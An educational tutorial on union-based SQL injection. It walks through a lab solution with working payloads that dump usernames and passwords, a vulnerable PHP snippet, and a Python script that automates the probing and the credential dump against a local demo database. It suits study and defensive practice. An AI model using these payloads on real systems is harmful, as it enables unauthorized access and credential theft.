Union Based Attacks

Introduction

Union-Based SQL Injection is a type of SQL injection attack that leverages the SQL UNION operator to combine the results of two or more SELECT queries into a single result set. When user input is concatenated into a query, an attacker can append a UNION SELECT of their own; the application executes the combined statement and renders the extra rows wherever it normally shows its results. This makes it the most direct way to extract data when query results are reflected in the page. The injected SELECT must return the same number of columns as the original query, with compatible types in each column position, which is why the attack starts by probing for the column count.

How to identify

To identify Union-Based SQL Injection vulnerabilities, look for inputs that are used directly in SQL queries without proper sanitization. Typical indicators include:

  1. Unexpected Behavior: Entering SQL syntax (a single quote, a double quote, or a UNION SELECT fragment) into a parameter causes an error page, an empty result or otherwise changed output. A lone single quote is the classic probe: if it breaks the page, the input is probably being spliced into a string literal inside the query.

  2. Manual Testing: Inject UNION SELECT NULL and add one NULL at a time until the number of NULLs matches the number of columns the original query returns. A UNION only succeeds when both SELECTs return the same number of columns, so every mismatched attempt produces an error (or an empty page), and the first attempt that returns normally gives the column count. NULL is used because it is compatible with every column type.

http://somewebsite.com/products.php?id=1 UNION SELECT NULL,NULL

  3. Source review: Sometimes you are given the application's source code. Here is an example of a vulnerable PHP snippet, in which the id parameter is concatenated straight into the query:

<?php
// Vulnerable: $_GET['id'] is concatenated directly into the query string,
// so a value such as  ' UNION SELECT username, password FROM users--
// closes the quoted literal and becomes part of the SQL that is executed.
$id = $_GET['id'];
$query = "SELECT name, price FROM products WHERE id = '$id'";
$result = mysqli_query($conn, $query);
?>

Code/tools/websites

Code Snippets

The UNION keyword lets you execute one or more additional SELECT queries and append their rows to the result of the original query. For example:

SELECT a, b FROM table1 UNION SELECT c, d FROM table2

Two rules constrain this: every SELECT in the UNION must return the same number of columns, and the data types in each column position must be compatible (NULL is compatible with anything, which is why it is used for probing). UNION also discards duplicate rows; UNION ALL keeps them. An injected UNION SELECT therefore lets the attacker pull columns from any table the application's database user can read, and the page renders those rows wherever it would normally show the original query's results.

Tools

  • SQLMap: An automated tool for SQL injection and database takeover.

  • Burp Suite: A web vulnerability scanner with tools for manual testing.

  • Havij: An automated SQL injection tool.

Websites

Zixem's 10 Challenges

https://ctflearn.com/challenge/149 (Hard)

Sample problem

Problem Statement

You are given access to a web application with a products category filter feature. The task is to identify if the application is vulnerable to Union-Based SQL Injection and extract all usernames and passwords in the database.

Link to lab

Solution

First, notice that clicking on any of the categories changes the URL of the page: the category is sent as a query-string parameter.

Appending a stray single quote (or other random characters) to that parameter's value produces an internal server error. The unbalanced quote broke the SQL statement, which indicates that the value is being placed directly into the query rather than bound as a parameter.

Knowing this we can now continue with our SQL injection.

  1. Determine the number of columns returned by the query and which of them hold text. A payload such as the following in the category parameter (the + signs are URL-encoded spaces and -- comments out the remainder of the original query) verifies that the query returns two columns and that both accept text; a column-count mismatch or a type mismatch would produce an error instead:

'+UNION+SELECT+'abc','def'--

  2. Use the following payload to retrieve the contents of the users table. The leading ' closes the original string literal, so the category filter matches nothing and the appended SELECT supplies the rows:

'+UNION+SELECT+username,+password+FROM+users--

  3. The usernames and passwords are now rendered in the page's results list.
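The whole procedure, from the NULL column-count probe in "How to identify", through the UNION rules in "Code Snippets", to the marker check and the users dump in this solution, as one added example that is not code from the original page, the PHP snippet or the lab. It runs against an in-memory SQLite database with constructed products and users tables (names chosen to match the page's queries); the functions build_db, vulnerable_lookup, safe_lookup, find_column_count, find_text_columns and dump_users are my own. It generalizes the page's single 'abc','def' payload into a per-column text probe, and pairs the vulnerable lookup with a parameter-bound one so the same payload can be seen to fail against it.

```python
import sqlite3


def build_db():
    # Constructed sample schema (assumption, not from the page): a products
    # table shaped like the PHP snippet's SELECT name, price, plus a users table.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price TEXT);
        INSERT INTO products VALUES (1, 'Widget', '9.99'), (2, 'Gadget', '19.99');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cret'), ('bob', 'hunter2');
    """)
    return conn


def vulnerable_lookup(conn, product_id):
    # Same defect as the PHP snippet: the raw input is spliced into a quoted
    # literal, so a value starting with ' closes the literal and the rest is SQL.
    query = f"SELECT name, price FROM products WHERE id = '{product_id}'"
    return conn.execute(query).fetchall()


def safe_lookup(conn, product_id):
    # Parameter binding: the input travels as a value and is never parsed as SQL.
    query = "SELECT name, price FROM products WHERE id = ?"
    return conn.execute(query, (product_id,)).fetchall()


def find_column_count(conn, max_cols=10):
    # "How to identify" step 2: UNION SELECT NULL, then NULL,NULL, ... until the
    # database stops rejecting the statement for a column-count mismatch.
    for n in range(1, max_cols + 1):
        payload = "1' UNION SELECT " + ",".join(["NULL"] * n) + "--"
        try:
            vulnerable_lookup(conn, payload)
            return n  # no error: this many columns matches the original query
        except sqlite3.OperationalError:
            continue  # mismatch: try one more NULL
    return None


def find_text_columns(conn, ncols, marker="abc"):
    # Put a string marker in one column position at a time; positions where the
    # marker comes back in a result row can carry text. SQLite is loosely typed,
    # so every column passes here; on MySQL or PostgreSQL a marker in a numeric
    # column raises an error instead, which is what makes the probe informative.
    text_cols = []
    for i in range(ncols):
        cols = ["NULL"] * ncols
        cols[i] = f"'{marker}'"
        payload = "1' UNION SELECT " + ",".join(cols) + "--"
        try:
            rows = vulnerable_lookup(conn, payload)
        except sqlite3.OperationalError:
            continue
        if any(row[i] == marker for row in rows):
            text_cols.append(i)
    return text_cols


def dump_users(conn):
    # The solution's final payload: the empty id matches no product, so the only
    # rows the page would render are the ones the injected SELECT appends.
    payload = "' UNION SELECT username, password FROM users--"
    return sorted(vulnerable_lookup(conn, payload))


if __name__ == "__main__":
    db = build_db()
    ncols = find_column_count(db)
    print("columns:", ncols)
    print("text columns:", find_text_columns(db, ncols))
    print("dumped:", dump_users(db))
    print("same payload, bound parameter:",
          safe_lookup(db, "' UNION SELECT username, password FROM users--"))
```

The -- comment swallows the trailing quote the application appends; on MySQL the comment marker needs a following space (-- ) or you can use # instead. The probing loop stops at the first count that does not error, which is exactly what a manual tester does one request at a time.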

Note: Zixem's website has some great problems on this topic; consider doing them to hone your skills :)

Conclusion

Union-Based SQL Injection is a powerful technique for extracting data from vulnerable applications. Identifying such vulnerabilities requires understanding the behavior of SQL queries and using appropriate tools and manual testing methods. By practicing with tools like SQLMap and platforms like PortSwigger Web Security Academy, you can enhance your skills in exploiting and securing web applications against SQL injection attacks.